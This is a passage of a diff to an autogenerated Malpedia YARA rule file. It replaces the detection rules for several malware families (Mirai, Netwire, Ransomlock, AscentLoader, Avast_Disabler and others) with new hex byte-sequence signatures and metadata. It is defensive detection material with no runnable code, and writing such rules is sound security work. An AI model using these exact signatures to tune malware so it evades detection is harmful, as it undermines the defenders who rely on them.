+		$sequence_3 = { 2b34bda0dd4000 c1fe06 8bc7 c1e005 }
+		$sequence_4 = { 83c40c 8d85e8fbffff 8985f0fcffff 83a520faffff00 }
+		$sequence_5 = { 56 50 e8???????? 8b85e44fffff 83c40c }
+		$sequence_6 = { 6a05 59 be???????? 8dbd0cfdffff }
+		$sequence_7 = { ff15???????? 6804010000 57 53 e8???????? 83c40c }
+		$sequence_8 = { 8945ec 6bc0f8 894df4 2955f4 014508 }
+		$sequence_9 = { 8bcb e8???????? 59 837e4400 57 bf???????? }
 
 	condition:
-		7 of them and filesize < 65536
+		7 of them and filesize < 163840
 }
-rule MALPEDIA_Win_Unidentified_089_Auto : FILE
+rule MALPEDIA_Win_Stowaway_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "f61e4a77-808b-5e07-801b-03e57ce838b5"
-		date = "2023-07-11"
-		modified = "2023-07-15"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_089"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.unidentified_089_auto.yar#L1-L98"
+		id = "6f8ce329-6af5-534d-8e65-b76b0e9206b8"
+		date = "2024-10-31"
+		modified = "2024-11-11"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.stowaway"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.stowaway_auto.yar#L1-L182"
 		license_url = "N/A"
-		logic_hash = "f9666eb88fbd91e0eb2e4b4c8812230b36d73d66192fed407aecfaa8f0ed362a"
+		logic_hash = "3f7831026b9a760683489b7cb3923fc1a6ee7aeca5e5576ea427cb584360b368"
 		score = 75
 		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
 		signator_config = "callsandjumps;datarefs;binvalue"
-		malpedia_rule_date = "20230705"
-		malpedia_hash = "42d0574f4405bd7d2b154d321d345acb18834a41"
-		malpedia_version = "20230715"
+		malpedia_rule_date = "20241030"
+		malpedia_hash = "26e26953c49c8efafbf72a38076855d578e0a2e4"
+		malpedia_version = "20241030"
 		malpedia_license = "CC BY-SA 4.0"
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 889dd4feffff 899d84feffff 898588feffff 889d74feffff 33c0 }
-		$sequence_1 = { 8b4508 e8???????? c20c00 e8???????? cc 6a30 }
-		$sequence_2 = { f2e9e3000000 55 8bec eb0d ff7508 e8???????? }
-		$sequence_3 = { 83f904 0f8582000000 8b75d0 8bfb }
-		$sequence_4 = { eb0f ff7634 57 ff562c }
-		$sequence_5 = { 88041e 880c1f 0fb6041e 8b4dfc 03c2 8b550c }
-		$sequence_6 = { 3dffffff7f 0f87a2000000 03c0 3d00100000 7227 }
-		$sequence_7 = { 56 6a01 8d4dec 8975d8 }
+		$sequence_0 = { 8a7cbe46 a3???????? 4e fb }
+		$sequence_1 = { 4e fb b501 2a37 }
+		$sequence_2 = { f67be8 7ce8 7de8 7ee8 }
+		$sequence_3 = { 76e8 77e8 78e8 79e8 }
+		$sequence_4 = { 78e8 79e8 7ae8 ce f67be8 7ce8 }
+		$sequence_5 = { 182e 087c1013 181c04 a6 }
+		$sequence_6 = { 3f 68fe260c00 5a 3cc3 }
+		$sequence_7 = { 7277 d7 c9 2127 }
+		$sequence_8 = { 322c0d01123df8 16 e0ff 2e1c43 1c56 186111 040f }
+		$sequence_9 = { 89f9 57 48 f2ae 55 ff9630a03b00 09c0 }
+		$sequence_10 = { 66790d 93 265e 27 }
+		$sequence_11 = { b423 53 e774 5b 004f49 5c 7221 }
+		$sequence_12 = { 40 3b740282 f4 d6 2a09 }
+		$sequence_13 = { 0c3f 090448 b8f58621b0 0448 }
+		$sequence_14 = { 58 c8737282 fc fc 91 }
+		$sequence_15 = { e6a0 2ea4 0e 0cef 30e5 46 }
+		$sequence_16 = { 56 a8b4 c8a03b0a a1???????? }
+		$sequence_17 = { 52 1d1af29c20 3ca4 5b }
+		$sequence_18 = { 7783 7786 7787 7788 }
 
 	condition:
-		7 of them and filesize < 389120
+		7 of them and filesize < 8003584
 }
-rule MALPEDIA_Win_Pocodown_Auto : FILE
+rule MALPEDIA_Win_Ransomlock_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "80a18124-a9b0-5acb-a47f-4f6b0c30bce1"
+		id = "42563703-564f-5a14-8829-64d9a4cd308b"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.pocodown"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.pocodown_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ransomlock"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.ransomlock_auto.yar#L1-L124"
 		license_url = "N/A"
-		logic_hash = "0c989d45fa577d150beb78b93b7b2b3b8b608ef00eacc1f315d54d3fff02abed"
+		logic_hash = "9226a9c11140386a0aeef708faad6314d93055d8b25dc4f728e9575057eabf60"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -97950,32 +98074,32 @@ rule MALPEDIA_Win_Pocodown_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { ffe1 8b44243c 8bcb 8bd3 39450c 0f94c1 413bcb }
-		$sequence_1 = { eb1b 488b542448 488b4c2430 e8???????? e9???????? 488b442430 eb13 }
-		$sequence_2 = { e8???????? 4533c0 488d542430 488d4c2450 e8???????? 488d4c2450 e8???????? }
-		$sequence_3 = { eb02 8bd6 f6c202 7408 49ffc2 493bc0 75dc }
-		$sequence_4 = { c744242002000000 e9???????? 33c0 83f801 0f844f010000 48b80000000001000000 4839442450 }
-		$sequence_5 = { eb38 8b842480000000 89442420 4c8b4c2458 488b442478 4c8b4020 488d15f0bf1e00 }
-		$sequence_6 = { e8???????? 482be0 488b442450 4883781000 740c 488b442450 4883781800 }
-		$sequence_7 = { ff5010 85c0 7507 33c0 e9???????? 488b442460 488b4008 }
-		$sequence_8 = { e8???????? 33c0 e9???????? 486344244c 488b4c2438 4803c8 488bc1 }
-		$sequence_9 = { e8???????? 85c0 7505 e9???????? 837c243841 7e05 e9???????? }
+		$sequence_0 = { 83c414 8dbdb0fdffff 32c0 b908020000 f3aa 8b3d???????? }
+		$sequence_1 = { ffd2 8b45e8 50 ff15???????? 5f 5e 5b }
+		$sequence_2 = { 85f6 0f84d1000000 6a01 53 6a03 53 53 }
+		$sequence_3 = { c20400 55 8bec 8b4508 ff4850 }
+		$sequence_4 = { 8b45fc 83c704 ff4dec 75c4 8b08 8b5108 50 }
+		$sequence_5 = { ffd0 85c0 7822 8b45fc 3bc6 741b 8b08 }
+		$sequence_6 = { a1???????? 8945fc 85c0 7450 817d0c10020000 }
+		$sequence_7 = { 8bf0 85f6 7512 8d95d4fdffff 52 57 }
+		$sequence_8 = { 8b45f0 3bc6 0f8418010000 8b08 8d55fc }
+		$sequence_9 = { 5d c22400 b801000000 5d c22400 }
 
 	condition:
-		7 of them and filesize < 6703104
+		7 of them and filesize < 360448
 }
-rule MALPEDIA_Win_Jessiecontea_Auto : FILE
+rule MALPEDIA_Win_Rhino_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "435a6af2-0956-5ced-bef4-bdde8bb54520"
+		id = "d85fe477-4e99-588f-91e6-0f1b3f138c82"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.jessiecontea"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.jessiecontea_auto.yar#L1-L163"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.rhino"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.rhino_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "901d415627c4e09bca131d66822cb1b54da6638557cfa44cdd1fbdb71a4f0951"
+		logic_hash = "00639a2283c7cb43c3dac639e40d4b9a0594ea339862d60e983925c4aeea1ea1"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -97989,38 +98113,32 @@ rule MALPEDIA_Win_Jessiecontea_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8bf0 ff15???????? 8b4dfc 83c414 8bc6 }
-		$sequence_1 = { 83f8ff 0f8411020000 8b3d???????? 6683bdc0fbffff2e }
-		$sequence_2 = { 3d04010000 7d8f 6a00 6a00 50 }
-		$sequence_3 = { 50 8d043e 50 ff35???????? }
-		$sequence_4 = { 57 89bd8cfbffff 898590fbffff ffd6 3d00010000 }
-		$sequence_5 = { 51 85c0 7406 83c002 50 eb01 57 }
-		$sequence_6 = { 8d95acf3ffff 8bce e8???????? 83c404 85c0 }
-		$sequence_7 = { 83c40c 8d85e8fdffff 6805010000 6a00 }
-		$sequence_8 = { 6689953e010000 66898540010000 b823000000 6689b542010000 6644899544010000 66898546010000 }
-		$sequence_9 = { 6689857e010000 8b05???????? 4133c6 66898580010000 0fb705???????? }
-		$sequence_10 = { 57 488bec 4883ec68 8b3d???????? 4c8d4d18 33c0 }
-		$sequence_11 = { 4889442420 4c8d4580 418d5601 ff15???????? 488b5580 }
-		$sequence_12 = { 4889442420 4533c9 8974247c 4c8d4590 48895d98 }
-		$sequence_13 = { 6683c032 83f03b 66894528 8b45c0 6683c033 83f020 }
-		$sequence_14 = { 4c89a424e8020000 41bc02000000 6644896580 894584 ff15???????? }
-		$sequence_15 = { 33c1 6689442476 8b442450 6683c012 }
+		$sequence_0 = { 895df0 57 895e10 8bfa c7461407000000 668906 8b4d08 }
+		$sequence_1 = { 0316 80790500 8955e0 7419 8b37 8d45ac 50 }
+		$sequence_2 = { 8b7d18 8b4d08 8bc6 c1e802 83e603 8b5108 8b4904 }
+		$sequence_3 = { ff7510 56 e8???????? 83c414 5e 8be5 5d }
+		$sequence_4 = { ff15???????? 2bf0 eb08 ff15???????? 03f0 ff742414 57 }
+		$sequence_5 = { c645fc00 8d7514 ff75fc c645f800 ff75f8 83ec0c 8bfc }
+		$sequence_6 = { 6a01 8d4508 50 8d45e4 68???????? 50 e8???????? }
+		$sequence_7 = { 3bfe 7512 8b33 8bcb ff5620 50 ff75a8 }
+		$sequence_8 = { 8b442424 894804 83c010 897714 89442424 3beb 0f8226fdffff }
+		$sequence_9 = { 8bc7 c1c802 33c8 03d9 837c241000 895c2414 743c }
 
 	condition:
-		7 of them and filesize < 413696
+		7 of them and filesize < 1288192
 }
-rule MALPEDIA_Win_Tandfuy_Auto : FILE
+rule MALPEDIA_Win_Ascentloader_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "98faff68-6444-5057-abe1-4d454646340b"
+		id = "52e48a17-f763-5fcc-946a-031eef291a19"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.tandfuy"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.tandfuy_auto.yar#L1-L129"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ascentloader"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.ascentloader_auto.yar#L1-L118"
 		license_url = "N/A"
-		logic_hash = "0d29f36f5ce30fba44a6664f50cc897adc5bd707aa4ee8b0311232ce455481f7"
+		logic_hash = "47183e13937994500473836e864be558b3709bce2edd5ef734fa1f084094231f"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -98034,32 +98152,32 @@ rule MALPEDIA_Win_Tandfuy_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { c3 b910000000 33c0 8d7c240c 8a54244d f3ab bf???????? }
-		$sequence_1 = { 8d44240c 50 c644241032 88542440 e8???????? 84c0 88442408 }
-		$sequence_2 = { 50 e8???????? b93f000000 33c0 8dbdecfdffff f3ab 66ab }
-		$sequence_3 = { 83c408 85c0 7418 8b5c2418 3bf3 7412 57 }
-		$sequence_4 = { 33c0 59 c3 8b44240c 50 ff15???????? b801000000 }
-		$sequence_5 = { 8dbc24c4020000 8d9424c4020000 f3ab 8d7c242c 83c9ff f2ae }
-		$sequence_6 = { 8d4c2408 89442400 51 8b4c2418 }
-		$sequence_7 = { 83c408 85c0 7418 8b5c2418 3bf3 7412 }
-		$sequence_8 = { e8???????? ffb69cd76e00 8d8560ffffff 50 e8???????? 6810200100 8d8560ffffff }
-		$sequence_9 = { 85c0 0f84ea000000 8d4c2424 51 68???????? 53 ff15???????? }
+		$sequence_0 = { 8d44244c 50 ffd7 8d3c03 }
+		$sequence_1 = { 33c0 66894de0 66894de6 51 8d4dc4 }
+		$sequence_2 = { 83c414 85c0 0f84a3010000 817c243400040000 8b5c2410 0f8388010000 85f6 }
+		$sequence_3 = { 59 8d8dfcfdffff e8???????? b901020000 }
+		$sequence_4 = { 5d c3 b8???????? e8???????? 81eca0060000 53 56 }
+		$sequence_5 = { 740f 56 ff15???????? 8b4df4 03c8 }
+		$sequence_6 = { 56 ff15???????? 8bce e8???????? e8???????? 85c0 743f }
+		$sequence_7 = { 6800800000 53 ff7604 ff15???????? 5b 8bce 5e }
+		$sequence_8 = { 8b7508 c7465cc0064100 83660800 33ff }
+		$sequence_9 = { 56 8b5004 8b00 57 }
 
 	condition:
-		7 of them and filesize < 155648
+		7 of them and filesize < 253952
 }
-rule MALPEDIA_Win_Sidewalk_Auto : FILE
+rule MALPEDIA_Win_Avast_Disabler_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "50903c03-c7b5-5314-a551-e4e23fcd9efd"
+		id = "6a09cca4-7cb6-5c97-b15b-4f7311a6621b"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.sidewalk"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.sidewalk_auto.yar#L1-L164"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.avast_disabler"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.avast_disabler_auto.yar#L1-L124"
 		license_url = "N/A"
-		logic_hash = "e6737ed096fc4d4ecc8ea3c0d1ac3b4b3bce3ee6030ce0fc8630ca3477945c10"
+		logic_hash = "19754a7bc503b1b28bdfc059b6eb230f6f3e29b2e990d8ace51bd954a83ec439"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -98073,38 +98191,32 @@ rule MALPEDIA_Win_Sidewalk_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 41880408 48ffc1 488d040a 483bc6 7ce2 4883c640 }
-		$sequence_1 = { 488d5204 4983e901 75d4 4863457f 33db }
-		$sequence_2 = { c1e810 880a c1e918 884202 884a03 4183f810 }
-		$sequence_3 = { 8945ef 8bc2 33c6 c1c010 }
-		$sequence_4 = { 41c1c610 4503e6 4403cb 4533d1 }
-		$sequence_5 = { 33f0 418bc1 4133c6 c1c608 c1c010 4403de }
-		$sequence_6 = { c1e108 0bc8 0fb642fe c1e108 0bc8 41890c10 }
-		$sequence_7 = { 4403c8 4533d1 41c1c208 4503fa 418bdf 33d8 }
-		$sequence_8 = { 33c3 c1c207 c1c00c 4403c8 4533d1 41c1c208 }
-		$sequence_9 = { 33c6 c1c010 4403d8 4133db c1c30c 03d3 }
-		$sequence_10 = { 4403cb 4533d1 4403ee 41c1c210 }
-		$sequence_11 = { 4403e8 4133db 418bcd c1c307 }
-		$sequence_12 = { 0bc8 41890c10 488d5204 4983e901 }
-		$sequence_13 = { 418bc0 c1e002 4d8d4904 4863d0 41ffc0 }
-		$sequence_14 = { 7d15 8a040f 3201 41880408 48ffc1 }
-		$sequence_15 = { 4133f8 c1c610 4433f2 c1c710 4403df }
+		$sequence_0 = { 85c0 7404 3bc1 7515 0f31 35???????? }
+		$sequence_1 = { 7534 837c371400 752d 89443714 6a08 8d45f4 50 }
+		$sequence_2 = { b94ee640bb 85c0 7404 3bc1 7515 }
+		$sequence_3 = { 2b4c3718 51 53 53 50 e8???????? 8b4dfc }
+		$sequence_4 = { 50 ff15???????? 6a01 8d45f8 50 ff750c ff15???????? }
+		$sequence_5 = { 33c0 40 394510 7534 837c371400 752d }
+		$sequence_6 = { 8b5c3718 83c112 03d9 837d1000 }
+		$sequence_7 = { 75a9 5f 5e 5b 5d c21000 55 }
+		$sequence_8 = { 51 803d????????00 7520 c605????????01 }
+		$sequence_9 = { 5f 5e 5b 8be5 5d c20c00 3b0d???????? }
 
 	condition:
-		7 of them and filesize < 237568
+		7 of them and filesize < 41984
 }
-rule MALPEDIA_Win_Hemigate_Auto : FILE
+rule MALPEDIA_Win_Lumar_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "0161e2c6-92a2-598c-bebd-ec068752da7a"
+		id = "7f6eed55-2de5-5fd1-92bb-28b323fbad6c"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.hemigate"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.hemigate_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.lumar"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.lumar_auto.yar#L1-L129"
 		license_url = "N/A"
-		logic_hash = "e109cb20ab0eaf9ed1c42d9088faaba592aaa23fc85ca45654d9c255b46038b9"
+		logic_hash = "4c7ebe5b3b93aaa9cf6694e15922d9cba2c0b75a9c7cd0df2741c632bee6f36c"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -98118,32 +98230,32 @@ rule MALPEDIA_Win_Hemigate_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { f7db 895dd4 663bca 0f83b6000000 eb10 663bc8 0f86ab000000 }
-		$sequence_1 = { 8bfa 0fb64610 8b5610 8845dc 8bc2 c1e808 8845dd }
-		$sequence_2 = { e8???????? 6a3c 8bf0 6a00 56 89b5f4feffff e8???????? }
-		$sequence_3 = { 8d4bfe c6460200 8d5901 eb04 85db 7411 8bc2 }
-		$sequence_4 = { e8???????? eb0b 6a01 50 51 8bcf e8???????? }
-		$sequence_5 = { ff37 e8???????? 57 e8???????? 83c414 6a00 ff75f8 }
-		$sequence_6 = { 0f8cae020000 0fb6140f 0fb6440f01 c1e208 03d0 0fb6440f02 c1e208 }
-		$sequence_7 = { 8945f4 8bc6 85c0 0f84dd000000 90 48 83f80e }
-		$sequence_8 = { 741a 8d45f4 50 6a04 ff75f8 ff15???????? 6a00 }
-		$sequence_9 = { c3 ff75f8 ff15???????? 83c404 5f 5e b80d000000 }
+		$sequence_0 = { 8b55f8 8b4df0 56 e8???????? 83c418 8bce e8???????? }
+		$sequence_1 = { 8b450c 48 89450c 8b45f4 3b45b8 730f 8b45f8 }
+		$sequence_2 = { 8a06 3ac3 7de6 8a06 6a03 5b 3c6c }
+		$sequence_3 = { 83e801 740b 2bc3 742d 83620c00 4e }
+		$sequence_4 = { 7618 8b848d74fbffff 89948d74fbffff 03d0 41 3bce }
+		$sequence_5 = { 8d8534ffffff 59 0fb70d???????? 0f45d1 0fb7ca 41 }
+		$sequence_6 = { 8bec b804100000 e8???????? 53 56 57 bb00100000 }
+		$sequence_7 = { e8???????? 83c40c 8945f0 8365e400 8b45b0 83e001 }
+		$sequence_8 = { 83fa02 73e1 5e c3 55 8bec }
+		$sequence_9 = { c60430c3 8d45fc 895dfc 50 ff15???????? 50 ff15???????? }
 
 	condition:
-		7 of them and filesize < 991232
+		7 of them and filesize < 81920
 }
-rule MALPEDIA_Win_Webc2_Adspace_Auto : FILE
+rule MALPEDIA_Elf_Mirai_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "31690ec3-53d2-516a-a2ac-2daa7b554ffe"
+		id = "49bbb193-8df3-5413-98b4-2dd8215ff30b"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.webc2_adspace"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.webc2_adspace_auto.yar#L1-L118"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/elf.mirai_auto.yar#L1-L108"
 		license_url = "N/A"
-		logic_hash = "7852a8a7e96f78b645860237edf52acf830636cf13e5faeed5b1eb81bda4c09a"
+		logic_hash = "73e144a4e19cc6b3055073cf3ad82cd5b793db0175f18a71bb7c0cd3632a6c7c"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -98157,32 +98269,32 @@ rule MALPEDIA_Win_Webc2_Adspace_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8d8580feffff 68???????? 50 ffd6 ff750c 894510 }
-		$sequence_1 = { ffd6 8bf8 c70424???????? ffd6 }
-		$sequence_2 = { 50 8d8580feffff 50 e8???????? 8b35???????? 8d8580feffff }
-		$sequence_3 = { 8d4dec e8???????? 8d4dec e8???????? 6a0a ff15???????? a1???????? }
-		$sequence_4 = { c3 56 8b742408 56 e8???????? 59 8b4c2410 }
-		$sequence_5 = { 0f84f8010000 80a4241c01000000 6a3f 59 33c0 }
-		$sequence_6 = { 7469 6a00 57 56 }
-		$sequence_7 = { 50 e8???????? 83c40c 8bf8 8d45fc 50 }
-		$sequence_8 = { 59 33c0 85ff 59 }
-		$sequence_9 = { a1???????? 40 50 57 56 }
+		$sequence_0 = { e9???????? e8???????? 66894314 e9???????? }
+		$sequence_1 = { 89d0 c1e005 01d0 89ca }
+		$sequence_2 = { c1ea03 89d0 c1e005 01d0 89ca 29c2 }
+		$sequence_3 = { 89d0 c1e005 01d0 89ca 29c2 }
+		$sequence_4 = { c1ea02 8d1492 29d0 83f804 }
+		$sequence_5 = { c7433400000000 894330 c6433801 c6433903 }
+		$sequence_6 = { 894330 c6433801 c6433903 c6433a03 c6433b06 }
+		$sequence_7 = { e8???????? c7433400000000 894330 c6433801 }
+		$sequence_8 = { e9???????? e8???????? 66894304 e9???????? }
+		$sequence_9 = { 66c1e808 d0e8 8d04c0 28c2 }
 
 	condition:
-		7 of them and filesize < 49152
+		7 of them and filesize < 2228224
 }
-rule MALPEDIA_Win_Herpes_Auto : FILE
+rule MALPEDIA_Win_Derohe_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "fedf32f5-9ae5-5123-9361-9a81a141f76e"
+		id = "c13e1a85-a976-55b6-90d6-648c0339f374"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.herpes"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.herpes_auto.yar#L1-L132"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.derohe"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.derohe_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "769ea4914adc8e6bb491030ee0781ca8f47cafb6846f9263dbbc09dc62dc70a2"
+		logic_hash = "6fba1305105906cd35356cda0d2e36fa76e73b801e4848b11ebc790c439c6d6c"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -98196,32 +98308,32 @@ rule MALPEDIA_Win_Herpes_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { ffd7 68???????? ffb6f0010000 89863c010000 ffd7 68???????? ffb6f0010000 }
-		$sequence_1 = { 6a02 6a00 6a00 6800000040 8d95f4fdffff 52 ff15???????? }
-		$sequence_2 = { 894dd0 c745c804000000 ffd6 85c0 755c 8b1d???????? ffd3 }
-		$sequence_3 = { 8d8d24faffff 51 57 ff15???????? 85c0 0f84e2000000 8b1d???????? }
-		$sequence_4 = { 33c9 3b04cd10c84100 7413 41 83f92d 72f1 8d48ed }
-		$sequence_5 = { 50 6a01 8d45cc 50 56 ff15???????? 894590 }
-		$sequence_6 = { 8dbd88fcffff e8???????? 84c0 745a 8b0d???????? 8d85c0fcffff 50 }
-		$sequence_7 = { 8b0d???????? 8d85c0fcffff 50 51 e8???????? c645fc0b 8b15???????? }
-		$sequence_8 = { e8???????? eb15 3bc3 7511 8b45b8 895dc8 }
-		$sequence_9 = { 83c404 ff15???????? 85c0 7418 6804010000 8d8c24e00a0000 }
+		$sequence_0 = { ffd0 8b542404 c60424fd 8b02 ffd0 8b542404 c6042412 }
+		$sequence_1 = { ffd0 8b542404 c604249d 8b02 ffd0 8b542404 c6042481 }
+		$sequence_2 = { ffd0 8b542404 c6042496 8b02 ffd0 8b542404 c60424f6 }
+		$sequence_3 = { ffd0 8b542404 c60424c0 8b02 ffd0 8b542404 c6042415 }
+		$sequence_4 = { e8???????? ebec 8b44242c 8984248c000000 8b442424 89842490000000 8b442428 }
+		$sequence_5 = { ffd0 8b542404 c60424e4 8b02 ffd0 8b542404 c6042467 }
+		$sequence_6 = { f7e2 899424dc040000 89842478010000 8b442454 8b94248c010000 f7e2 899424d8040000 }
+		$sequence_7 = { ffd0 8b542404 c6042494 8b02 ffd0 8b542404 c60424de }
+		$sequence_8 = { ffd0 8b542404 c60424f4 8b02 ffd0 8b542404 c6042487 }
+		$sequence_9 = { ffd0 8b542404 c60424ae 8b02 ffd0 8b542404 c6042416 }
 
 	condition:
-		7 of them and filesize < 319488
+		7 of them and filesize < 35788800
 }
-rule MALPEDIA_Win_Grey_Energy_Auto : FILE
+rule MALPEDIA_Win_Netwire_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "2194ec68-6952-5855-89b8-1a483c36ceb6"
+		id = "2c3233b5-61d2-5539-be18-0c5c0b8c6392"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.grey_energy"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.grey_energy_auto.yar#L1-L162"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.netwire"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.netwire_auto.yar#L1-L110"
 		license_url = "N/A"
-		logic_hash = "6dd36b9cf8b9672a3513055fe48f5d646f4ed637cb72460d1965a0ebc0972231"
+		logic_hash = "0b138a1b5ce5fce5b2fe27d94e6291c8b6ec4ddfb907147d54fe206b7b73d328"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -98235,38 +98347,32 @@ rule MALPEDIA_Win_Grey_Energy_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 50 53 53 6800000008 57 }
-		$sequence_1 = { 8945d4 e8???????? 68???????? 8945d0 e8???????? }
-		$sequence_2 = { e8???????? 68???????? 8945cc e8???????? 68???????? 8945d4 e8???????? }
-		$sequence_3 = { 6800000008 57 53 53 }
-		$sequence_4 = { 8b4508 0345f0 0fbe08 8b45f0 }
-		$sequence_5 = { 8b45f0 8b4d08 0fb70c41 8b45f0 }
-		$sequence_6 = { eb14 8b45ec 8b4df8 8b55f0 }
-		$sequence_7 = { 8b45f8 0345ec 8808 eb10 }
-		$sequence_8 = { 7507 33c0 e9???????? c745f004000000 }
-		$sequence_9 = { 6a40 ff15???????? 8945f8 837df800 7507 33c0 }
-		$sequence_10 = { 8b4df8 8b55f0 8b7508 668b1456 }
-		$sequence_11 = { 75f9 53 ff15???????? 8b75f8 }
-		$sequence_12 = { 81e1ff000000 8b45ec 8b55f8 66890c42 eb14 8b45ec }
-		$sequence_13 = { 7407 c60100 41 48 75f9 ff75f8 }
-		$sequence_14 = { 742e 8d45f0 50 6a04 8d45f4 50 }
-		$sequence_15 = { 57 ff75e8 ff75f0 ffd6 85c0 0f84b8000000 ff75fc }
+		$sequence_0 = { e8???????? c7042446000000 e8???????? c7042449000000 e8???????? }
+		$sequence_1 = { e8???????? c7442410000000f0 c744240c01000000 c744240800000000 c744240400000000 }
+		$sequence_2 = { c70424d0070000 e8???????? e9???????? e8???????? }
+		$sequence_3 = { 89442404 c70424???????? e8???????? a3???????? }
+		$sequence_4 = { 890424 e8???????? 83ec10 83f806 }
